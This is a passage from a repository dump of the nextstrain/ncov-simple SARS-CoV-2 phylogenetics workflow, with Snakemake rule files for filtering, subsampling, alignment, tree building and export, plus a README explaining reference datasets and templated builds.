params:\n filter_arguments = lambda w: config[\"origins\"][w.origin].get(\"filters\",\"\"),\n tmp_alignment = \"pre-processed/{origin}/filtered.fasta\"\n resources:\n # Memory use scales primarily with the size of the metadata file.\n mem_mb=lambda wildcards, input: 15 * int(input.metadata.size / 1024 / 1024)\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n augur filter \\\n --sequences {input.sequences} \\\n --metadata {input.metadata} \\\n --include {input.include} \\\n --exclude {input.exclude} \\\n {params.filter_arguments} \\\n --output {params.tmp_alignment} 2>&1 | tee {log};\n xz -2 {params.tmp_alignment}\n \"\"\"\n\n\nrule combine_bulk_sequences:\n input:\n sequences = [f\"pre-processed/{origin}/filtered.fasta.xz\" for origin in config[\"origins\"]],\n mutation_summary = [f\"pre-processed/{origin}/mutation_summary.tsv\" for origin in config[\"origins\"]]\n output:\n rules.preprocess.input.sequences\n run:\n if len(input.sequences)==1:\n shell(f\"cp {input.sequences} {output}\")\n\nrule combine_bulk_metadata:\n input:\n [f\"data/{origin}/metadata.tsv\" for origin in config[\"origins\"]]\n output:\n rules.preprocess.input.metadata\n run:\n if len(input)==1:\n shell(f\"cp {input} {output}\")\n\nrule index_sequences:\n message:\n \"\"\"\n Index sequence composition for faster filtering.\n \"\"\"\n input:\n sequences = rules.combine_bulk_sequences.output\n output:\n sequence_index = rules.preprocess.input.sequence_index\n log:\n \"logs/index_sequences.txt\"\n benchmark:\n \"benchmarks/index_sequences.txt\"\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n augur index \\\n --sequences {input.sequences} \\\n --output {output.sequence_index} 2>&1 | tee {log}\n \"\"\"\n\n\nrule mutation_summary:\n message: \"Summarizing {input.alignment}\"\n input:\n alignment = rules.prealign.output.alignment,\n insertions = rules.prealign.output.insertions,\n translations = rules.prealign.output.translations,\n reference = config[\"files\"][\"alignment_reference\"],\n genemap = config[\"files\"][\"annotation\"]\n output:\n mutation_summary = \"pre-processed/{origin}/mutation_summary.tsv\"\n log:\n \"logs/mutation_summary_{origin}.txt\"\n benchmark:\n \"benchmarks/mutation_summary_{origin}.txt\"\n params:\n outdir = \"pre-processed/{origin}/translations\",\n basename = \"seqs\",\n genes=config[\"genes\"],\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n python3 scripts/mutation_summary.py \\\n --alignment {input.alignment} \\\n --insertions {input.insertions} \\\n --directory {params.outdir} \\\n --basename {params.basename} \\\n --reference {input.reference} \\\n --genes {params.genes:q} \\\n --genemap {input.genemap} \\\n --output {output.mutation_summary} 2>&1 | tee {log}\n \"\"\"\n\n" }, { "alpha_fraction": 0.5942004919052124, "alphanum_fraction": 0.6013255715370178, "avg_line_length": 34.91071319580078, "blob_id": "9a0758f1bf25e16d8fdcdafb89ee304497d73b17", "content_id": "9adf1ec1f69176b928884539269f1ed5a8890d80", "detected_licenses": [ "LicenseRef-scancode-public-domain" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6035, "license_type": "permissive", "max_line_length": 138, "num_lines": 168, "path": "/workflow/snakemake_rules/subsampling.smk", "repo_name": "nextstrain/ncov-simple", "src_encoding": "UTF-8", "text": "'''\nThis part of the workflow starts from files\n\n - pre-processed/sequences.fasta\n - pre-processed/metadata.tsv\n\nand produces files\n\n - builds/{build_name}/sequences.fasta\n - 
builds/{build_name}/metadata.tsv\n\n'''\n\nbuild_dir = config.get(\"build_dir\", \"builds\")\n\nrule prepare_build:\n input:\n sequences = build_dir + \"/{build_name}/sequences.fasta\",\n metadata = build_dir + \"/{build_name}/metadata.tsv\"\n\ndef _get_priority_file(w):\n if \"priorities\" in config[\"builds\"][w.build_name][\"subsamples\"][w.subsample]:\n return build_dir + f\"/{w.build_name}/priorities_{config['builds'][w.build_name]['subsamples'][w.subsample].get('priorities')}.tsv\"\n else:\n return []\n\ndef _get_priority_argument(w):\n f = _get_priority_file(w)\n if f:\n return \"--priority \" + f\n else:\n return \"\"\n\nrule subsample:\n message:\n \"\"\"\n Subsample all sequences by '{wildcards.subsample}' scheme for build '{wildcards.build_name}' with the following parameters:\n \"\"\"\n input:\n sequences = \"pre-processed/filtered.fasta.xz\",\n metadata = \"pre-processed/metadata.tsv\",\n sequence_index = \"pre-processed/sequence_index.tsv\",\n include = config[\"files\"][\"include\"],\n priorities = _get_priority_file\n output:\n sequences = build_dir + \"/{build_name}/sample-{subsample}.fasta\",\n strains = build_dir + \"/{build_name}/sample-{subsample}.txt\",\n log:\n \"logs/subsample_{build_name}_{subsample}.txt\"\n benchmark:\n \"benchmarks/subsample_{build_name}_{subsample}.txt\"\n params:\n filter_arguments = lambda w: config[\"builds\"][w.build_name][\"subsamples\"][w.subsample]['filters'],\n priorities = _get_priority_argument\n resources:\n # Memory use scales primarily with the size of the metadata file.\n mem_mb=lambda wildcards, input: 15 * int(input.metadata.size / 1024 / 1024)\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n augur filter \\\n --sequences {input.sequences} \\\n --metadata {input.metadata} \\\n --sequence-index {input.sequence_index} \\\n --include {input.include} \\\n {params.filter_arguments} \\\n {params.priorities} \\\n --output {output.sequences} \\\n --output-strains {output.strains} 2>&1 | tee {log}\n \"\"\"\n\nrule proximity_score:\n message:\n \"\"\"\n Determine priority for inclusion as phylogenetic context by\n genetic similarity to sequences in the focal set for build '{wildcards.build_name}'.\n \"\"\"\n input:\n alignment = \"pre-processed/filtered.fasta.xz\",\n reference = config[\"files\"][\"alignment_reference\"],\n focal_alignment = build_dir + \"/{build_name}/sample-{focus}.fasta\"\n output:\n proximities = build_dir + \"/{build_name}/proximity_{focus}.tsv\"\n log:\n \"logs/subsampling_proximity_{build_name}_{focus}.txt\"\n benchmark:\n \"benchmarks/proximity_score_{build_name}_{focus}.txt\"\n params:\n chunk_size=10000,\n ignore_seqs = config['refine']['root']\n resources:\n # Memory scales at ~0.15 MB * chunk_size (e.g., 0.15 MB * 10000 = 1.5GB).\n mem_mb=4000\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n python3 scripts/get_distance_to_focal_set.py \\\n --reference {input.reference} \\\n --alignment {input.alignment} \\\n --focal-alignment {input.focal_alignment} \\\n --ignore-seqs {params.ignore_seqs} \\\n --chunk-size {params.chunk_size} \\\n --output {output.proximities} 2>&1 | tee {log}\n \"\"\"\n\nrule priority_score:\n input:\n proximity = rules.proximity_score.output.proximities,\n sequence_index = rules.index_sequences.output.sequence_index,\n output:\n priorities = build_dir + \"/{build_name}/priorities_{focus}.tsv\"\n log:\n \"logs/priority_score_{build_name}_{focus}.txt\"\n benchmark:\n \"benchmarks/priority_score_{build_name}_{focus}.txt\"\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n python3 scripts/priorities.py \\\n --sequence-index 
{input.sequence_index} \\\n --proximities {input.proximity} \\\n --output {output.priorities} 2>&1 | tee {log}\n \"\"\"\n\n\nrule combine_subsamples:\n # Similar to rule combine_input_metadata, this rule should only be run if multiple inputs are being used (i.e. multiple origins)\n message:\n \"\"\"\n Combine and deduplicate aligned & filtered FASTAs from multiple origins in preparation for subsampling: {input}.\n \"\"\"\n input:\n lambda w: [build_dir + f\"/{w.build_name}/sample-{subsample}.fasta\"\n for subsample in config[\"builds\"][w.build_name][\"subsamples\"]]\n output:\n rules.prepare_build.input.sequences\n benchmark:\n \"benchmarks/combine_subsamples_{build_name}.txt\"\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n python3 scripts/combine-and-dedup-fastas.py --input {input} --output {output}\n \"\"\"\n\n\nrule extract_metadata:\n input:\n strains = lambda w: [build_dir + f\"/{w.build_name}/sample-{subsample}.txt\"\n for subsample in config[\"builds\"][w.build_name][\"subsamples\"]],\n metadata = \"pre-processed/metadata.tsv\"\n output:\n metadata = rules.prepare_build.input.metadata\n params:\n adjust = lambda w: config[\"builds\"][w.build_name].get(\"metadata_adjustments\",{}),\n benchmark:\n \"benchmarks/extract_metadata_{build_name}.txt\"\n run:\n import pandas as pd\n strains = set()\n for f in input.strains:\n with open(f) as fh:\n strains.update([x.strip() for x in fh if x[0]!='#'])\n\n d = pd.read_csv(input.metadata, index_col=0, sep='\\t').loc[list(strains)]\n if len(params.adjust):\n for adjustment in params.adjust:\n ind = d.eval(adjustment[\"query\"])\n d.loc[ind, adjustment['dst']] = d.loc[ind, adjustment['src']]\n\n d.to_csv(output.metadata, sep='\\t')\n\n\n" }, { "alpha_fraction": 0.5736980438232422, "alphanum_fraction": 0.5830396413803101, "avg_line_length": 37.1987190246582, "blob_id": "4680030dd09b5fb53a3e6fb9639e6e36507266a", "content_id": "6fb9fec29e0932c1d0c149013e04d22a9bb7d122", "detected_licenses": [ "LicenseRef-scancode-public-domain" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17877, "license_type": "permissive", "max_line_length": 150, "num_lines": 468, "path": "/workflow/snakemake_rules/core.smk", "repo_name": "nextstrain/ncov-simple", "src_encoding": "UTF-8", "text": "'''\nThis part of the workflow starts from files\n\n - builds/{build_name}/sequences.fasta\n - builds/{build_name}/metadata.tsv\n\nand produces files\n\n - auspice/ncov_{build_name}.json\n - auspice/ncov_{build_name}_tip-frequencies.json\n - auspice/ncov_{build_name}_root-sequence.json\n\n'''\n\nbuild_dir = config.get(\"build_dir\", \"builds\")\nauspice_dir = config.get(\"auspice_dir\", \"auspice\")\nauspice_prefix = config.get(\"auspice_prefix\", \"ncov\")\n\nrule align:\n message:\n \"\"\"\n Aligning sequences to {input.reference}\n - gaps relative to reference are considered real\n \"\"\"\n input:\n sequences = build_dir + \"/{build_name}/sequences.fasta\",\n genemap = config[\"files\"][\"annotation\"],\n reference = config[\"files\"][\"alignment_reference\"]\n output:\n alignment = build_dir + \"/{build_name}/aligned.fasta\",\n insertions = build_dir + \"/{build_name}/insertions.tsv\",\n translations = expand(build_dir + \"/{{build_name}}/translations/aligned.gene.{gene}.fasta\", gene=config.get('genes', ['S']))\n params:\n outdir = build_dir + \"/{build_name}/translations\",\n genes = ','.join(config.get('genes', ['S'])),\n basename = \"aligned\"\n log:\n \"logs/align_{build_name}.txt\"\n benchmark:\n 
\"benchmarks/align_{build_name}.txt\"\n conda: config[\"conda_environment\"]\n threads: 4\n resources:\n mem_mb=3000\n shell:\n \"\"\"\n nextalign \\\n --jobs={threads} \\\n --reference {input.reference} \\\n --genemap {input.genemap} \\\n --genes {params.genes} \\\n --sequences {input.sequences} \\\n --output-dir {params.outdir} \\\n --output-basename {params.basename} \\\n --output-fasta {output.alignment} \\\n --output-insertions {output.insertions} > {log} 2>&1\n \"\"\"\n\n\nrule mask:\n message:\n \"\"\"\n Mask bases in alignment {input.alignment}\n - masking {params.mask_arguments}\n \"\"\"\n input:\n alignment = rules.align.output.alignment\n output:\n alignment = build_dir + \"/{build_name}/masked.fasta\",\n log:\n \"logs/mask_{build_name}.txt\"\n benchmark:\n \"benchmarks/mask_{build_name}.txt\"\n params:\n mask_arguments = lambda w: config.get(\"mask\",\"\")\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n python3 scripts/mask-alignment.py \\\n --alignment {input.alignment} \\\n {params.mask_arguments} \\\n --output {output.alignment} 2>&1 | tee {log}\n \"\"\"\n\nrule tree:\n message: \"Building tree\"\n input:\n alignment = rules.mask.output.alignment\n output:\n tree = build_dir + \"/{build_name}/tree_raw.nwk\"\n params:\n args = lambda w: config[\"tree\"].get(\"tree-builder-args\",\"\") if \"tree\" in config else \"\"\n log:\n \"logs/tree_{build_name}.txt\"\n benchmark:\n \"benchmarks/tree_{build_name}.txt\"\n threads: 8\n resources:\n # Multiple sequence alignments can use up to 40 times their disk size in\n # memory, especially for larger alignments.\n # Note that Snakemake >5.10.0 supports input.size_mb to avoid converting from bytes to MB.\n mem_mb=lambda wildcards, input: 40 * int(input.size / 1024 / 1024)\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n augur tree \\\n --alignment {input.alignment} \\\n --tree-builder-args {params.args} \\\n --output {output.tree} \\\n --nthreads {threads} 2>&1 | tee {log}\n \"\"\"\n\nrule refine:\n message:\n \"\"\"\n Refining tree\n - estimate timetree\n - use {params.coalescent} coalescent timescale\n - estimate {params.date_inference} node dates\n \"\"\"\n input:\n tree = rules.tree.output.tree,\n alignment = rules.mask.output.alignment,\n metadata = build_dir + \"/{build_name}/metadata.tsv\"\n output:\n tree = build_dir + \"/{build_name}/tree.nwk\",\n node_data = build_dir + \"/{build_name}/branch_lengths.json\"\n log:\n \"logs/refine_{build_name}.txt\"\n benchmark:\n \"benchmarks/refine_{build_name}.txt\"\n threads: 1\n resources:\n # Multiple sequence alignments can use up to 15 times their disk size in\n # memory.\n # Note that Snakemake >5.10.0 supports input.size_mb to avoid converting from bytes to MB.\n mem_mb=lambda wildcards, input: 15 * int(input.size / 1024 / 1024)\n params:\n root = config[\"refine\"][\"root\"],\n clock_rate = config[\"refine\"].get(\"clock_rate\", 0.0007),\n clock_std_dev = config[\"refine\"].get(\"clock_std_dev\", 0.003),\n coalescent = config[\"refine\"].get(\"coalescent\", \"opt\"),\n date_inference = config[\"refine\"].get(\"date_inference\", 'marginal'),\n divergence_unit = config[\"refine\"].get(\"divergence_unit\", 'mutations'),\n clock_filter_iqd = config[\"refine\"].get(\"clock_filter_iqd\", 4),\n keep_polytomies = \"--keep-polytomies\" if config[\"refine\"].get(\"keep_polytomies\", False) else \"\",\n timetree = \"\" if config[\"refine\"].get(\"no_timetree\", False) else \"--timetree\"\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n augur refine \\\n --tree 
{input.tree} \\\n --alignment {input.alignment} \\\n --metadata {input.metadata} \\\n --output-tree {output.tree} \\\n --output-node-data {output.node_data} \\\n --root {params.root} \\\n {params.timetree} \\\n {params.keep_polytomies} \\\n --clock-rate {params.clock_rate} \\\n --clock-std-dev {params.clock_std_dev} \\\n --coalescent {params.coalescent} \\\n --date-inference {params.date_inference} \\\n --divergence-unit {params.divergence_unit} \\\n --date-confidence \\\n --no-covariance \\\n --clock-filter-iqd {params.clock_filter_iqd} 2>&1 | tee {log}\n \"\"\"\n\nrule ancestral:\n message:\n \"\"\"\n Reconstructing ancestral sequences and mutations\n - inferring ambiguous mutations\n \"\"\"\n input:\n tree = rules.refine.output.tree,\n alignment = rules.mask.output.alignment\n output:\n node_data = build_dir + \"/{build_name}/nt_muts.json\"\n log:\n \"logs/ancestral_{build_name}.txt\"\n benchmark:\n \"benchmarks/ancestral_{build_name}.txt\"\n params:\n inference = config[\"ancestral\"][\"inference\"]\n resources:\n # Multiple sequence alignments can use up to 15 times their disk size in\n # memory.\n # Note that Snakemake >5.10.0 supports input.size_mb to avoid converting from bytes to MB.\n mem_mb=lambda wildcards, input: 15 * int(input.size / 1024 / 1024)\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n augur ancestral \\\n --tree {input.tree} \\\n --alignment {input.alignment} \\\n --output-node-data {output.node_data} \\\n --inference {params.inference} \\\n --infer-ambiguous 2>&1 | tee {log}\n \"\"\"\n\nrule translate:\n message: \"Translating amino acid sequences\"\n input:\n tree = rules.refine.output.tree,\n node_data = rules.ancestral.output.node_data,\n reference = config[\"files\"][\"reference\"]\n output:\n node_data = build_dir + \"/{build_name}/aa_muts.json\"\n log:\n \"logs/translate_{build_name}.txt\"\n benchmark:\n \"benchmarks/translate_{build_name}.txt\"\n resources:\n # Memory use scales primarily with size of the node data.\n mem_mb=lambda wildcards, input: 3 * int(input.node_data.size / 1024 / 1024)\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n augur translate \\\n --tree {input.tree} \\\n --ancestral-sequences {input.node_data} \\\n --reference-sequence {input.reference} \\\n --output-node-data {output.node_data} 2>&1 | tee {log}\n \"\"\"\n\nrule aa_muts_explicit:\n message: \"Translating amino acid sequences\"\n input:\n tree = rules.refine.output.tree,\n translations = lambda w: rules.align.output.translations\n output:\n node_data = build_dir + \"/{build_name}/aa_muts_explicit.json\",\n translations = expand(build_dir + \"/{{build_name}}/translations/aligned.gene.{gene}_withInternalNodes.fasta\", gene=config.get('genes', ['S']))\n params:\n genes = config.get('genes', 'S')\n log:\n \"logs/aamuts_{build_name}.txt\"\n benchmark:\n \"benchmarks/aamuts_{build_name}.txt\"\n resources:\n # Multiple sequence alignments can use up to 15 times their disk size in\n # memory.\n # Note that Snakemake >5.10.0 supports input.size_mb to avoid converting from bytes to MB.\n mem_mb=lambda wildcards, input: 15 * int(input.size / 1024 / 1024)\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n python3 scripts/explicit_translation.py \\\n --tree {input.tree} \\\n --translations {input.translations:q} \\\n --genes {params.genes} \\\n --output {output.node_data} 2>&1 | tee {log}\n \"\"\"\n\nrule traits:\n message:\n \"\"\"\n Inferring ancestral traits for {params.columns!s}\n - increase uncertainty of reconstruction by {params.sampling_bias_correction} 
to partially account for sampling bias\n \"\"\"\n input:\n tree = rules.refine.output.tree,\n metadata = build_dir + \"/{build_name}/metadata.tsv\"\n output:\n node_data = build_dir + \"/{build_name}/traits.json\"\n log:\n \"logs/traits_{build_name}.txt\"\n benchmark:\n \"benchmarks/traits_{build_name}.txt\"\n params:\n columns = config[\"traits\"][\"columns\"],\n sampling_bias_correction = config[\"traits\"][\"sampling_bias_correction\"]\n resources:\n # Memory use scales primarily with the size of the metadata file.\n mem_mb=lambda wildcards, input: 15 * int(input.metadata.size / 1024 / 1024)\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n augur traits \\\n --tree {input.tree} \\\n --metadata {input.metadata} \\\n --output {output.node_data} \\\n --columns {params.columns} \\\n --confidence \\\n --sampling-bias-correction {params.sampling_bias_correction} 2>&1 | tee {log}\n \"\"\"\n\nrule clades:\n message: \"Adding internal clade labels\"\n input:\n tree = rules.refine.output.tree,\n aa_muts = rules.translate.output.node_data,\n nuc_muts = rules.ancestral.output.node_data,\n clades = config[\"files\"][\"clades\"]\n output:\n node_data = build_dir + \"/{build_name}/clades.json\"\n log:\n \"logs/clades_{build_name}.txt\"\n benchmark:\n \"benchmarks/clades_{build_name}.txt\"\n resources:\n # Memory use scales primarily with size of the node data.\n mem_mb=lambda wildcards, input: 3 * int(input.size / 1024 / 1024)\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n augur clades --tree {input.tree} \\\n --mutations {input.nuc_muts} {input.aa_muts} \\\n --clades {input.clades} \\\n --output-node-data {output.node_data} 2>&1 | tee {log}\n \"\"\"\n\nrule tip_frequencies:\n message: \"Estimating censored KDE frequencies for tips\"\n input:\n tree = rules.refine.output.tree,\n metadata = build_dir + \"/{build_name}/metadata.tsv\"\n output:\n tip_frequencies_json = build_dir + \"/{build_name}/tip-frequencies.json\"\n log:\n \"logs/tip_frequencies_{build_name}.txt\"\n benchmark:\n \"benchmarks/tip_frequencies_{build_name}.txt\"\n params:\n min_date = config[\"frequencies\"][\"min_date\"],\n max_date = lambda w: datetime.datetime.today().strftime(\"%Y-%m-%d\"),\n pivot_interval = config[\"frequencies\"][\"pivot_interval\"],\n pivot_interval_units = config[\"frequencies\"][\"pivot_interval_units\"],\n narrow_bandwidth = config[\"frequencies\"][\"narrow_bandwidth\"],\n proportion_wide = config[\"frequencies\"][\"proportion_wide\"]\n resources:\n # Memory use scales primarily with the size of the metadata file.\n mem_mb=lambda wildcards, input: 15 * int(input.metadata.size / 1024 / 1024)\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n augur frequencies \\\n --method kde \\\n --metadata {input.metadata} \\\n --tree {input.tree} \\\n --min-date {params.min_date} \\\n --max-date {params.max_date} \\\n --pivot-interval {params.pivot_interval} \\\n --pivot-interval-units {params.pivot_interval_units} \\\n --narrow-bandwidth {params.narrow_bandwidth} \\\n --proportion-wide {params.proportion_wide} \\\n --output {output.tip_frequencies_json} 2>&1 | tee {log}\n \"\"\"\n\nif 'distances' in config:\n rule distances:\n input:\n tree = rules.refine.output.tree,\n alignments = build_dir + \"/{build_name}/translations/aligned.gene.S_withInternalNodes.fasta\",\n distance_maps = config['distances']['maps']\n params:\n genes = 'S',\n comparisons = config['distances']['comparisons'],\n attribute_names = config['distances']['attributes']\n output:\n node_data = build_dir + 
\"/{build_name}/distances.json\"\n conda:\n config[\"conda_environment\"]\n shell:\n \"\"\"\n augur distance \\\n --tree {input.tree} \\\n --alignment {input.alignments} \\\n --gene-names {params.genes} \\\n --compare-to {params.comparisons} \\\n --attribute-name {params.attribute_names} \\\n --map {input.distance_maps} \\\n --output {output}\n \"\"\"\n\nrule colors:\n message: \"Constructing colors file\"\n input:\n ordering = config[\"files\"][\"ordering\"],\n color_schemes = config[\"files\"][\"color_schemes\"],\n metadata = build_dir + \"/{build_name}/metadata.tsv\"\n output:\n colors = build_dir + \"/{build_name}/colors.tsv\"\n log:\n \"logs/colors_{build_name}.txt\"\n benchmark:\n \"benchmarks/colors_{build_name}.txt\"\n resources:\n # Memory use scales primarily with the size of the metadata file.\n # Compared to other rules, this rule loads metadata as a pandas\n # DataFrame instead of a dictionary, so it uses much less memory.\n mem_mb=lambda wildcards, input: 5 * int(input.metadata.size / 1024 / 1024)\n conda: config[\"conda_environment\"]\n shell:\n \"\"\"\n python3 scripts/assign-colors.py \\\n --ordering {input.ordering} \\\n --color-schemes {input.color_schemes} \\\n --output {output.colors} \\\n --metadata {input.metadata} 2>&1 | tee {log}\n \"\"\"\n\n\ndef _get_node_data_by_wildcards(wildcards):\n \"\"\"Return a list of node data files to include for a given build's wildcards.\n \"\"\"\n # Define inputs shared by all builds.\n wildcards_dict = dict(wildcards)\n inputs = [\n rules.refine.output.node_data,\n rules.ancestral.output.node_data,\n rules.translate.output.node_data,\n rules.clades.output.node_data,\n rules.traits.output.node_data,\n rules.aa_muts_explicit.output.node_data\n ]\n if \"distances\" in config: inputs.append(rules.distances.output.node_data)\n\n # Convert input files from wildcard strings to real file names.\n inputs = [input_file.format(**wildcards_dict) for input_file in inputs]\n return inputs\n\nrule export:\n message: \"Exporting data files for auspice\"\n input:\n tree = rules.refine.output.tree,\n metadata = build_dir + \"/{build_name}/metadata.tsv\",\n node_data = _get_node_data_by_wildcards,\n auspice_config = lambda w: config[\"builds\"][w.build_name][\"auspice_config\"] if \"auspice_config\" in config[\"builds\"][w.build_name] \\\n else config[\"files\"][\"auspice_config\"],\n colors = lambda w: config[\"builds\"][w.build_name][\"colors\"] if \"colors\" in config[\"builds\"][w.build_name]\\\n else ( config[\"files\"][\"colors\"] if \"colors\" in config[\"files\"]\\\n else rules.colors.output.colors.format(**w) ),\n lat_longs = config[\"files\"][\"lat_longs\"],\n description = lambda w: config[\"builds\"][w.build_name][\"description\"] if \"description\" in config[\"builds\"][w.build_name]\n else config[\"files\"][\"description\"],\n tip_freq_json = rules.tip_frequencies.output.tip_frequencies_json\n output:\n auspice_json = auspice_dir + f\"/{auspice_prefix}_{{build_name}}.json\",\n root_sequence_json = auspice_dir + f\"/{auspice_prefix}_{{build_name}}_root-sequence.json\",\n tip_freq_json = auspice_dir + f\"/{auspice_prefix}_{{build_name}}_tip-frequencies.json\"\n log:\n \"logs/export_{build_name}.txt\"\n benchmark:\n \"benchmarks/export_{build_name}.txt\"\n params:\n title = lambda w: config[\"builds\"][w.build_name].get(\"title\", \"SARS-CoV-2 phylogeny\")\n resources:\n # Memory use scales primarily with the size of the metadata file.\n mem_mb=lambda wildcards, input: 15 * int(input.metadata.size / 1024 / 1024)\n conda: 
config[\"conda_environment\"]\n shell:\n \"\"\"\n augur export v2 \\\n --tree {input.tree} \\\n --metadata {input.metadata} \\\n --node-data {input.node_data} \\\n --auspice-config {input.auspice_config} \\\n --include-root-sequence \\\n --colors {input.colors} \\\n --lat-longs {input.lat_longs} \\\n --title {params.title:q} \\\n --description {input.description} \\\n --output {output.auspice_json} 2>&1 | tee {log};\n cp {input.tip_freq_json} {output.tip_freq_json}\n \"\"\"\n" }, { "alpha_fraction": 0.8160919547080994, "alphanum_fraction": 0.8247126340866089, "avg_line_length": 115, "blob_id": "2d66edd0217f9979ad12fd962e8e64195b302b20", "content_id": "887ad3492986c32632f7b583d33b852ba599a8ed", "detected_licenses": [ "LicenseRef-scancode-public-domain" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 348, "license_type": "permissive", "max_line_length": 178, "num_lines": 3, "path": "/profiles/genbank/description.md", "repo_name": "nextstrain/ncov-simple", "src_encoding": "UTF-8", "text": "This phylogeny shows evolutionary relationships of SARS-CoV-2 viruses from the ongoing novel coronavirus COVID-19 pandemic using open data shared by researchers across the world.\nThe data that went into this analysis and the intermediate steps are available on nextstrain.org.\n * data.nextstrain.org/files/ncov/open/<data_set_name>_alignment.fasta\n" }, { "alpha_fraction": 0.7207520604133606, "alphanum_fraction": 0.7261490225791931, "avg_line_length": 48.07692337036133, "blob_id": "9b856e17486e88e2e4dba8d601a42316f60c4a08", "content_id": "b3e6aa38086c4bcf6c9badbb160c63c713ed31de", "detected_licenses": [ "LicenseRef-scancode-public-domain" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5758, "license_type": "permissive", "max_line_length": 241, "num_lines": 117, "path": "/README.md", "repo_name": "nextstrain/ncov-simple", "src_encoding": "UTF-8", "text": "🚨⚠️ Go to [**neherlab/ncov-simple**](https://github.com/neherlab/ncov-simple/) for an actively maintained version of this workflow. You're currently viewing `nextstrain/ncov-simple` which is many commits behind the `neherlab` fork. ⚠️🚨\n\n*This repository currently serves as a sandbox to explore how our main [ncov workflow](github.com/nextstrain/ncov) could restructured and simplified. 
Feel free to use it, but don't expect continuity or extensive documentation at this point.*\n\n## Simplified nextstrain/ncov (SARS-CoV-2) workflow using reference data sets\n\nThe reference data sets are assembled from SARS-CoV-2 data available in the public domain.\nThe availability of open data varies greatly by region, and the only regions for which we have good coverage at the moment are the United States and Oceania.\n\n### Set up\n\n```\ngit clone https://github.com/nextstrain/ncov-simple.git\n./decompress_example.sh\n```\nThe second step is only necessary if you want to run the example profile.\nThe standard nextstrain conda environment should be sufficient to run this workflow.\nIt can then be run as\n```\nsnakemake --profile example_profile\n```\n\n### Make your own build\nCopy the `example_profile` folder and its content and modify the file `builds.yaml`.\nThe example profile contains builds that are specified like this example for an extra small build using a reference set for Washington, US:\n```\nbuilds:\n us-washington:\n reference_metadata: \"https://data.nextstrain.org/ncov-reference-datasets/US-WA-xsmall_metadata.tsv.xz\"\n reference_sequences: \"https://data.nextstrain.org/ncov-reference-datasets/US-WA-xsmall_sequences.fasta.xz\"\n user_metadata: \"example_data/metadata.tsv\"\n user_sequences: \"example_data/sequences.fasta\"\n```\nYou want to change the entries `user_metadata` and `user_sequences` to point at your data and choose an appropriate reference data set.\nThese entries can be a list of multiple files.\n\n\n### Available reference data sets\n\nCurrently, we provide reference datasets representing all available data, the standard Nextstrain regions, and the US states.\nEach data set comes in three sizes -- one standard size with 4k sequences, a small one with 2k sequences, and an extra small one with 1k sequences.\nThe sequences are a random sample from the focal region (emphasis on the last 4 months) and augmented by sequences from outside the focal regions using Nextstrain's proximity guided sampling.\n\nThe data are available at `data.nextstrain.org/ncov-reference-datasets` and follow the URL pattern\n\n```\nhttps://data.nextstrain.org/ncov-reference-datasets/<region>-<size>_metadata.tsv.xz\nhttps://data.nextstrain.org/ncov-reference-datasets/<region>-<size>_sequences.fasta.xz\n```\nwhere `region` can be `global`, `africa`, `asia`, `europe`, `north-america`, `oceania`, `south-america` or a US state using two-letter state abbreviations as in `US-CA`, `US-NJ`, etc.\n\n\n## Templated builds\n\nIn some situations, you want to run builds for many different data subsamples, for example for different countries, states, variants etc.\nTo facilitate such builds, this repo contains functionality to __template__ builds.\nThis is used in the profiles `profiles/basel-swiss`, `profiles/basel-countries`, and `profiles/genbank` and works as follows:\n\n * you specify lists of features for which you want to make builds. 
For example regions, countries, or build sizes.\n * you specify a number of parameters for the builds; these are expressions that will be evaluated\n * you specify metadata adjustments, which are pandas queries\n * you specify subsampling schemes.\n\nThe builds spec would then look like this:\n```\ntemplated-builds:\n regions:\n build_patterns:\n region:\n north-america: \"North America\"\n asia: \"Asia\"\n africa: \"Africa\"\n europe: \"Europe\"\n south-america: \"South America\"\n oceania: \"Oceania\"\n size:\n 4k: 4000\n 2k: 2000\n 1k: 1000\n build_name: \"{region}_{size}\"\n ...\n```\nThis defines a templated build `regions` that will generate builds of three different sizes for each region.\nThe subsampling parameters are defined as\n```\n subsampling_parameters:\n date_cutoff: \"(datetime.date.today() - datetime.timedelta(weeks=18)).strftime('%Y-%m-%d')\"\n s_global_early: \"int(0.1*{size})\"\n s_global_late: \"int(0.2*{size})\"\n s_region_early: \"int(0.3*{size})\"\n s_region_late: \"int(0.4*{size})\"\n subsamples:\n global_early:\n filters: \"--exclude-where region='{region}' --group-by country year month --subsample-max-sequences {s_global_early} --max-date {date_cutoff}\"\n region_early:\n filters: \"--exclude-where region!='{region}' --group-by country year month --subsample-max-sequences {s_region_early} --max-date {date_cutoff}\"\n global_late:\n filters: \"--exclude-where region='{region}' --group-by country year month --subsample-max-sequences {s_global_late} --min-date {date_cutoff}\"\n priorities: \"region_late\"\n region_late:\n filters: \"--exclude-where region!='{region}' --group-by country year month --subsample-max-sequences {s_region_late} --min-date {date_cutoff}\"\n```\nIn each expression, the variables are substituted before the command is launched.\nMetadata adjustments (for example to replace all divisions outside a focal region with a higher-order geographic designation) can be implemented as\n```\n metadata_adjustments:\n - query: region!='{region}'\n dst: country\n src: region\n - query: region!='{region}'\n dst: division\n src: region\n - query: region!='{region}'\n dst: location\n src: region\n```\nAgain, the build parameters and subsampling parameters will be substituted before the expressions are evaluated.\n\n\n" }, { "alpha_fraction": 0.7340425252914429, "alphanum_fraction": 0.7340425252914429, "avg_line_length": 30, "blob_id": "00615485a3d5abe2852eb6524d49d968b65abf4b", "content_id": 